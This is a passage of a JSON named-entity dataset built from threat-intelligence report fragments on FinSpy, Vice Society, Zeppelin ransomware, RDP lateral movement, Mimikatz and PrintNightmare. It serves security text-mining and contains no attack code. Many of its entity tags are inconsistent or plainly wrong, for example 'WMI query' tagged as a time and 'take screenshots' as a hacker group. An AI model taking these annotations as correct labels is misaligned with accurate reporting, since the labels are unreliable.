"O", "B-SamFile" ] }, { "tokens": [ "created", "a", "Scheduled", "Task" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors’", "exploit", "payload", "created", "Scheduled", "Task" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "actors", "used", "RDP" ], "ner_tags": [ "O", "O", "O", "B-Way" ] }, { "tokens": [ "RDP", "sessions" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "the", "actors", "leveraged", "RDP", "to", "propagate", "to", "several", "hosts", "within", "the", "network." ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "used", "RDP", "to", "move", "laterally", "to", "multiple", "hosts", "on", "the", "network." ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "RDP", "connections" ], "ner_tags": [ "B-Org", "O" ] }, { "tokens": [ "and", "the", "built-in", "Windows", "user", "account", "DefaultAccount", "[T1078.001]", "to", "move", "laterally" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "used", "built-in", "Windows", "user", "account", "DefaultAccount." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Mimikatz", "–", "a", "credential", "theft", "tool." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actors", "then", "executed", "Mimikatz", "on", "VDI-KMS", "to", "harvest", "credentials" ], "ner_tags": [ "O", "O", "B-HackOrg", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "threat", "actor", "was", "observed", "attempting", "to", "dump", "the", "Local", "Security", "Authority", "Subsystem", "Service", "(LSASS)", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "trying", "to", "dump", "LSASS", "process." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "used", "Mimikatz", "to", "harvest", "credentials." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Ngrok", "–", "a", "reverse", "proxy", "tool", "for", "proxying", "an", "internal", "service", "out", "onto", "an", "Ngrok", "domain" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "were", "able", "to", "proxy", "[T1090]", "RDP", "sessions,", "which", "were", "only", "observable", "on", "the", "local", "network" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "downloaded", "the", "following", "tools" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "to", "download", "next", "stage", "and", "execute", "it" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "exploit", "payload", "then", "downloaded", "mdeploy.text" ], "ner_tags": [ "O", "B-Exp", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "downloaded", "malware", "and", "multiple", "tools", "to", "the", "network" ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "as", "outgoing", "HTTPS", "port", "443", "connections" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "actors", "removed", "malicious", "file", "mde.ps1", "from", "the", "dis." ], "ner_tags": [ "O", "B-HackOrg", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "removed", "mde.ps1", "from", "the", "disk" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "$BASE64", "encoded", "payload" ], "ner_tags": [ "B-SamFile", "O", "O" ] }, { "tokens": [ "recording", "files", "to", "be", "uploaded", "when", "their", "download", "is", "requested", "by", "the", "C2", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "uploads", "it", "back", "to", "the", "server." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uploads", "it", "to", "the", "C2", "server." ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sends", "it", "to", "the", "C2", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sends", "it", "to", "the", "C2", "server." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Upload", "a", "recording", "file", "with", "a", "specified", "name", "to", "the", "C2", "server." ], "ner_tags": [ "B-Features", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "data", "to", "be", "exfiltrated", "to", "the", "C2", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "sends", "data", "to", "the", "C2", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Sends", "the", "shellcode", "execution", "results", "to", "the", "C2", "server" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypts", "the", "next", "loader", "stage" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypts", "it" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Decrypts" ], "ner_tags": [ "O" ] }, { "tokens": [ "decryption", "procedure" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Decrypts" ], "ner_tags": [ "O" ] }, { "tokens": [ "shellcode", "decrypts" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "After", "decrypting" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "decrypts", "the", "Orchestrator" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decodes", "the", "directory", "path" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decrypts", "the", "hidden", "page" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decrypting", "them", "on", "the", "fly." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "decrypts", "it", "with", "XOR" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Decrypts", "the", "Trojan", "with", "a", "XOR-based", "cipher" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "The", "decryption", "key" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "injects", "the", "Trojan", "loader", "into", "exe." ], "ner_tags": [ "B-SamFile", "B-Features", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "can", "be", "injected", "to", "processes" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "malware", "injects", "the", "ProcessWorm", "into", "all", "processes", "running", "on", "the", "system" ], "ner_tags": [ "O", "B-SamFile", "B-Features", "I-Features", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "injects", "itself", "into", "processes" ], "ner_tags": [ "B-Way", "I-Way", "O", "O" ] }, { "tokens": [ "injects", "the", "ProcessWorm", "if", "needed." ], "ner_tags": [ "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "injects", "the", "ProcessWorm", "into", "processes" ], "ner_tags": [ "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "is", "injected", "into", "all", "running", "processes." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "injecting", "code" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "The", "injected", "Trojan", "loader" ], "ner_tags": [ "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "collects", "specific", "system", "information" ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "Returns", "information", "about", "the", "machine’s", "BIOS." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "information", "about", "the", "operating", "system" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "computer", "name" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Overall", "available", "space", "Space", "available", "to", "current", "user", "(may", "be", "less", "than", "overall", "available", "space", "due", "to", "quotas)", "Disk", "capacity" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "information", "about", "the", "computer", "system" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "checks", "if", "it", "is", "running", "on", "a", "64-bit", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "OSVERSIONINFOEXW", "and", "SYSTEM_INFO", "structures" ], "ner_tags": [ "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "the", "current", "process", "name" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "the", "list", "of", "running", "processes" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "ProcessDebugPort", "value", "returned", "by", "NtQueryInformationProcess", "for", "current", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "ProcessDebugObjectHandle", "value", "returned", "by", "NtQueryInformationProcess", "for", "current", "process" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "process", "names", "of", "the", "current", "process", "tree", "(i.e.", "the", "current", "process,", "the", "parent", "process,", "the", "grandparent", "process,", "etc.)" ], "ner_tags": [ "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obtains", "the", "list", "of", "processes" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "extract", "specific", "information", "about", "running", "processes" ], "ner_tags": [ "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "regularly", "obtains", "the", "list", "of", "running", "processes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "examines", "all", "the", "processes", "on", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "looks", "for", "specific", "processes" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "acquires", "handles", "for", "all", "running", "processes", "on", "the", "system,", "which", "results", "in", "either", "winlogon.exe", "or", "explorer.exe", "obtaining", "numerous", "process", "handles." ], "ner_tags": [ "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "When", "it", "detects", "a", "starting", "first", "(or", "a", "stopping", "last)", "instance", "of", "a", "process", "from", "the", "list" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "running", "processes" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "a", "part", "of", "code", "from", "the", ".text", "section", "(roughly", "8", "KB)", "is", "overwritten", "with", "heavily", "obfuscated", "code" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", "code" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "obfuscated", "trampoline", "in", "the", ".text", "section." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "This", "trampoline", "is", "protected", "with", "an", "obfuscator" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", "with", "FinSpy", "Mutator" ], "ner_tags": [ "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "This", "module", "is", "an", "obfuscated", "shellcode." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "obfuscated", "DLL" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "obfuscated", "with", "FinSpy", "VM." ], "ner_tags": [ "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "It", "is", "encrypted", "with", "a", "256-byte", "RC4", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "conceals", "memory", "areas", "that", "contain", "the", "Trojan", "components’", "code", "and", "data." ], "ner_tags": [ "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypts", "the", "Orchestrator’s", "pages", "with", "a", "cipher", "based", "on", "XOR", "and", "ROL", "operations", "and", "assigns", "the", "PAGE_NOACCESS", "attribute", "to", "them" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "protected", "with", "an", "obfuscator" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "An", "obfuscator", "similar", "to", "OLLVM", "is", "used", "to", "protect", "FinSpy" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "It", "is", "obfuscated", "with", "a", "protector", "resembling", "the", "open", "source", "OLLVM", "obfuscator." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "The", "encrypted", "VFS", "file." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "setup", "configuration", "file,", "which", "is", "encrypted", "with", "RC4" ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "an", "obfuscator", "resembling", "OLLVM", "or", "both", "these", "protectors" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "a", "call", "to", "the", "CreateWindowExW" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "NtTerminateProcess", "and", "ExitProcess", "functions" ], "ner_tags": [ "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "CreateFileW", "API." ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "API", "function" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "various", "WinAPI", "functions." ], "ner_tags": [ "O", "B-Way", "O" ] }, { "tokens": [ "low-level", "API", "functions", "(such", "as", "NtEnumerateValueKey", "or", "NtQuerySystemInformation)" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "NtTestAlert", "function" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "call", "the", "NtTestAlert", "function" ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "NtTestAlert", "function" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "CreateProcessInternalW", "API", "function" ], "ner_tags": [ "B-SamFile", "O", "O" ] }, { "tokens": [ "NtQueueAPCThread", "function" ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "KiUserExceptionDispatcher", "function" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "WinAPI", "file", "manipulation", "functions." ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O" ] }, { "tokens": [ "calling", "API", "functions", "from", "this", "library" ], "ner_tags": [ "I-Features", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "hooks", "the", "kernel’s", "PsCreateSystemThread", "function" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "launches", "a", "slightly", "modified", "Metasploit", "Reverse", "HTTPS", "stager" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "connects", "to", "a", "configured", "C2", "server", "using", "HTTPS", "for", "communication." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Makes", "an", "initial", "POST", "request", "to", "the", "C2", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "to", "the", "C2", "server", "via", "a", "POST", "request." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "All", "communications", "between", "the", "server", "are", "encrypted", "with", "RC4" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "encrypted", "with", "RC4" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "A", "snippet", "of", "the", "RC4", "key", "generation", "function" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "the", "list", "of", "network", "adapter", "types,", "IP", "and", "MAC", "addresses", "assigned", "to", "them." ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "names", "of", "shortcuts", "in", "the", "Desktop", "directory." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "the", "path", "to", "the", "‘Program", "Files’", "folder." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "the", "short", "form", "of", "the", "user’s", "profile", "folder" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "the", "user’s", "profile", "folder" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "the", "list", "of", "object", "names", "in", "the", "\\GLOBAL??", "directory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Retrieve", "the", "list", "of", "files" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "gets", "the", "list", "of", "recent", "files" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "search,", "delete", "files." ], "ner_tags": [ "O", "O", "B-Features" ] }, { "tokens": [ "file", "listings" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Create", "file", "listing", "recordings" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "the", "path", "to", "the", "user’s", "temporary", "folder." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "the", "current", "domain", "SID" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "the", "current", "user’s", "name" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "Returns", "the", "current", "user’s", "SID." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "WMI", "query" ], "ner_tags": [ "B-Time", "O" ] }, { "tokens": [ "Creates", "a", "scheduled", "task", "that", "runs", "at", "system", "startup" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "Task", "Scheduler", "launches", "it", "at", "system", "startup" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "scheduled", "task", "properties" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "a", "DLL", "obfuscated", "with", "VMProtect." ], "ner_tags": [ "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "unpacking", "the", "Orchestrator" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "unpacks", "it", "with", "aPLib." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Orchestrator", "is", "unpacked" ], "ner_tags": [ "B-SamFile", "O", "O" ] }, { "tokens": [ "The", "Orchestrator", "(as", "well", "as", "plugins)", "are", "packed", "with", "aPLib", "and", "encrypted", "with", "AES." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "unpacks", "with", "aPLib" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "encrypted", "with", "XOR", "and", "compressed", "with", "aPLib." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "unpacks", "it", "with", "aPLib" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "takes", "a", "screenshot" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "screenshots" ], "ner_tags": [ "O" ] }, { "tokens": [ "screen" ], "ner_tags": [ "O" ] }, { "tokens": [ "take", "screenshots", "during,", "online", "conversations." ], "ner_tags": [ "I-Features", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "Capture", "the", "screen", "area", "around", "mouse", "click", "locations" ], "ner_tags": [ "B-SamFile", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Take", "screenshots", "with", "a", "specified", "frame", "rate,", "and", "livestream", "or", "record", "them." ], "ner_tags": [ "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "screenshots" ], "ner_tags": [ "O" ] }, { "tokens": [ "Commands", "are", "used", "to", "download", "and", "install", "plugins" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Commands", "are", "used", "to", "download", "and", "run", "the", "Trojan", "Installer." ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "B-SecTeam" ] }, { "tokens": [ "Upload,", "download" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "downloading", "and", "executing", "specific", "utilities" ], "ner_tags": [ "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "downloads", "Security", "Shellcodes", "from", "the", "C2", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "may", "save", "recording", "files", "in", "the", "working", "directory" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stored", "in", "the", "working", "directory" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware’s", "working", "directory" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Once", "the", "working", "directory", "is", "prepared," ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "keylogs" ], "ner_tags": [ "O" ] }, { "tokens": [ "keystrokes" ], "ner_tags": [ "O" ] }, { "tokens": [ "record", "keystrokes" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Delete", "a", "recording", "with", "a", "given", "filename", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Uninstall", "the", "backdoor." ], "ner_tags": [ "B-Way", "B-Tool", "B-Way" ] }, { "tokens": [ "wipes", "all", "the", "files", "and", "registry", "keys", "created", "by", "the", "backdoor" ], "ner_tags": [ "B-Features", "I-Features", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "delete", "files." ], "ner_tags": [ "B-SamFile", "O" ] }, { "tokens": [ "creating", "an", "APC", "(Asynchronous", "Procedure", "Call)", "with", "the", "procedure", "address", "pointing", "to", "the", "start", "of", "the", "shellcode." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APC", "injections" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "The", "asynchronous", "procedure", "places", "a", "hook", "on", "the", "NtTestAlert", "function", "and", "then", "exits" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "will", "be", "loaded", "with", "the", "help", "of", "the", "APC", "injection", "loader." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "hooked", "process", "creation", "function", "clears", "a", "possible", "hook", "of", "the", "NtQueueAPCThread", "function", "and", "then", "uses", "it", "to", "create", "an", "APC", "procedure", "in", "the", "new", "process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "junk", "code", "created", "by", "the", "ProcessWorm", "loader" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "entries", "point", "to", "buffers", "of", "randomly", "generated", "junk", "code" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "method", "names", "contain", "junk." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "executable", "is", "prepended", "with", "0x4000", "random", "bytes", "and", "encrypted", "with", "RC4" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "documents", "sent", "to", "the", "printer." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Steal", "files", "which", "are", "printed", "by", "the", "victim" ], "ner_tags": [ "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "recently", "opened", "documents" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Uninstall", "a", "plugin", "from", "the", "machine" ], "ner_tags": [ "B-Way", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Sets", "up", "persistence", "by", "creating", "an", "entry", "in", "the", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "registry", "key." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "adds", "it", "to", "the", "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", "key" ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "Bash", "script" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "launched", "on", "every", "startup", "by", "rundll32.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "creates", "a", "thread", "in", "the", "kernel", "that", "injects", "the", "next", "stage", "into", "winlogon.exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "A", "thread", "with", "trampoline", "shellcode", "is", "created", "inside", "exe." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "victim", "downloads", "a", "Trojanized", "application", "and", "executes", "it." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "we", "identified", "numerous", "legitimate", "applications", "backdoored" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamViewer" ], "ner_tags": [ "B-SamFile" ] }, { "tokens": [ "Cleans", "API", "functions", "potentially", "hooked", "by", "security", "solutions" ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "attackers", "also", "exploited", "vulnerabilities", "such", "as", "PrintNightmare", "to", "escalate", "privileges" ], "ner_tags": [ "B-HackOrg", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Software", "vulnerabilities,", "such", "as", "PrintNightmare", "(CVE-2021-1675)", "and", "(CVE-2021-34527),", "may", "be", "exploited", "in", "an", "attempt", "to", "elevate", "privileges." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "operated", "sites", "on", "the", "Tor", "network", "using", "the", "following", ".onion" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "this", "key", "is", "typically", "obfuscated", "with", "AES", "256", "encryption." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O" ] }, { "tokens": [ "encrypted", "PowerShell." ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Upon", "execution,", "the", "ransomware", "binary", "deletes", "itself" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Creating", "the", "HKCU\\Software\\Zeppelin", "registry", "key" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "by", "modifying", "the", "Registry." ], "ner_tags": [ "O", "B-Way", "O", "O" ] }, { "tokens": [ "valid", "credentials", "have", "been", "used", "by", "Vice", "Society", "to", "gain", "initial", "access." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Internet-facing", "applications", "and", "systems", "vulnerabilities", "can", "be", "exploited,", "such", "as", "PrintNightmare", "(CVE-2021-1675)", "and", "(CVE-2021-34527),", "to", "gain", "initial", "access." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Features", "O", "B-Features", "O", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "Batch", "files", "are", "used" 